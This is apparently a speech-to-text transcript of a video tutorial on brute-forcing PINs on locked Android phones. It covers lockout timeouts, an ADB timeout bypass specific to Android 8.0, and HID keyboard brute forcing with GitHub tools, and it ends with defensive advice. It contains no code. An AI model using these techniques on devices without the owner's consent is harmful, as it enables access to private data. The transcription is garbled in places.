welcome to my video where i will
demonstrate how to unlock
pin protected lock screen android device
this video is about the possibilities
about the options how to unlock
such a smartphone we will focus only on
android
pin not iphones and we will cover
mainly pin another pattern or passcode
protected
device this video is a result of my
research
how to unlock such smartphone using
various techniques
and i've been posting on my social media
and i received dozens if not hundreds of
requests
to create such tutorials how this can be
done on your
locked smartphone also there is no
100 guaranteed technique that would
unlock your
protected android what is the purpose
well you forgot your pin you found your
old smartphone and you would like to
retrieve the data that are stored
but you don't recall the pin code
someone in your family deceased someone
close to you your friend
and still you would like to retrieve the
photos the videos the memories
this is also one of the popular requests
i've been receiving
on my social and last not least is for
forensic analysis
you need to unlock a smartphone to
retrieve the data this is only for
educational purposes
don't try to get inside unlocked
smartphone
without explicit permission of its owner
now let's continue with the
possibilities how to unlock
such protected smartphone there are a
few the first one using an exploit
exploit that bypasses lock screen
protection or escalates privileges to
root
then using trial and error which could
be
automated into a brute force and the
last one if you don't care
about the data you can factor a reset
from recovery
there are not many options not many
possibilities so the only one
that we will focus in this video is a
brute force
of course using brute force has its
limitations actually there are two to my
knowledge the first one is a timeout
there is no way to bypass timeout
without exploit what does it mean after
five
wrong pin attempts 30 seconds cooldown
another five wrong another 30 seconds
and then after each
wrong pin there is 30 seconds cooldown
until you reach 41 attempts then there
is 60 second cooldown
after each wrong pin these timeouts are
for stock android
at least to my knowledge if you are
using a custom ui custom
miui then there might be some
differences
if we put this in actual numbers how
long
it would take to unlock a different pin
protection if you have four digits pin
it means there are
ten thousands of possible combinations
it would take to go through all of them
using the script i will
shortly introduced 167 hours which is
approximately
70. and by increasing number of digits
the time
spent on cracking exponentially
increases so if you use eight digit
pin code it would take 190 years
second limitation is factor reset this
is not set by default it needs to be set
by a user
from setting and it means that after 15
wrong attempts
the device will erase all the data so
there are two limitations again timeout
and factory reset
let's focus on the brute force brute
force can be performed using
two options the first one is using adb
where usb debugging needs to be enabled
and the second one
using hid human interface device a
rubber
ducky let's start with adb what are the
requirements
smartphone needs to have enabled usb
debugging
an option the smartphone that we want to
crack or brute force the pin needs to be
authorized by connected computer or
another android the problem is
that if we receive smartphone that is
already locked
there is no way to enable usb debugging
and authorized smartphone because of
that i believe this technique
is not really useful still i will show
you one tool
vbrooter that is available on github
all the links will be posted in the
video description still
using adb there is no way how to bypass
timeouts
except for one android version which is
android 8.0
it was introduced a new feature that it
was possible to
change pin pattern password of the lock
screen
using new adb command and that feature
contained a bug
which would result in bypassing timeouts
but only for android 8.0
i tested that for android 8.1
8.0 and 10 and this feature
or this bot is not present anymore i
prepared a quick demonstration i have
two smartphones
this is the main one that will perform
the brute force i'm using otg
cable this is android 8.8.0 i will
unlock the smartphone using my pin
0 0 26 and i will
start the beep router on my android it
means that it goes through
all the pin combinations starting from
zero zero zero zero until it reaches
zero zero twenty six there are no
throttles on the pin
you see the errors this means that there
should be timeout cooldown
but that was the problem in here
it was not implemented correctly because
of that we can
unlock our smartphone by using
all the combinations
in a short time period still other
versions of android are not supported
and you still
need to have usb debugging enabled
because of that i believe this is
obsolete
we will focus on hid using either rubber
ducky
or android what does it mean hid human
interface device
it means that connected smartphone or
usb
to a targeted device that is locked and
pin protected
behaves as a keyboard and this keyboard
will send
exact keys and these keys are actually
ping codes
there is no need to enabled usb
debugging or device being good scenes
if you connect the keyboard to your
device to your tablet or smartphone
it will work requirements for this
technique is either have a rooted
android smartphone that has enabled hid
or a rubber ducky usb how to
enable hid for android i prepared
already two videos that are available
on my youtube channel then we need otg
cable that is connected to our main and
targeted smartphone
for hid brute force we will use android
pin and brute force tool that is
available on github
it's for free and super handy it has a
lot of
pros and cons for example you can test
various pins from
length of digit from length 1 to 10. it
uses optimized pin list for
four five and six digit pins this is
based on the most popular
top pins being used based on the
statistics
the text all the time out
and if you unplug your smartphone scenes
if you're trying to crack the pen it
will take a lot of hours and you need to
recharge your device
if you unplug charge a smartphone plug
back in and continues where it stopped
there's one problem since it's hid
connected keyboard in this case
it cannot receive any events from a
smartphone so it doesn't know
when the pin was correct or not so it
would still continue
guessing and entering other pins in the
row
in the list because of that we need to
manually
grab the attempt from the logs and
compare it with a pin
that is in a pin list i'll demonstrate
it later on
how to install the tool get clone change
mode for execution
and just trigger it there are various
options
when you try to create the four length
pin this
is the command after you get clone it's
necessary to
edit config file that contains
in one of the last lines hid keyboard
a global value that has a path to
hid binary for a keyboard this needs to
be replaced for yours and here's a quick
example main smartphone executes
this script where we try to guess the
pin with four digits
and after five attempts there is a
timeout and the script waits
until timeout is done
i also prepared a longer demonstration
on this topic
where i will perform guessing
a more sophisticated pin actually it
will it will went through
44 pins first five attempts
timeout another five percent timeout
and until we reach attempt 41
it would increase to 60 seconds
until right now we will guess the
correct pin
and as you can see there is no lock of
the correct pin
we only see that there was attempt
number 45. based on this attempt
number of attempt we will we have to
search the pin
and the list of optimized pins and we
also see the time how long
it took in this case it was around 25
minutes
how to prevent this scenario if you
believe you might be at target
use longer pins either six to eight
digits and as you saw it will take
years to crack that also don't use easy
to guess
paint codes or you can also switch to
passwords one more option
sad factor research after 15 wrong
attempts
i don't use this technique because if
you have a kit in your home it might not
end up really well for you we're heading
to conclusion
when you have a locked smartphone there
are not many possibilities how to unlock
such smartphone you need to either have
a exploit or you have to brute force the
pin there's no
other option this technique was only
against
pin no password since password might be
more complex
you would need a wordless tracking
pattern it's not that simple
because our script needs to be
customized for various displays
and needs to perform clicks and swipes
at particular
parts of the screen also if you use
password
it's much more secure using brute force
it's a long
lasting operation but there is no other
option how to unlock
such protected smartphone because of
that you need to be really
patient thank you very much for your
time i hope you
never need to use this technique bye
guys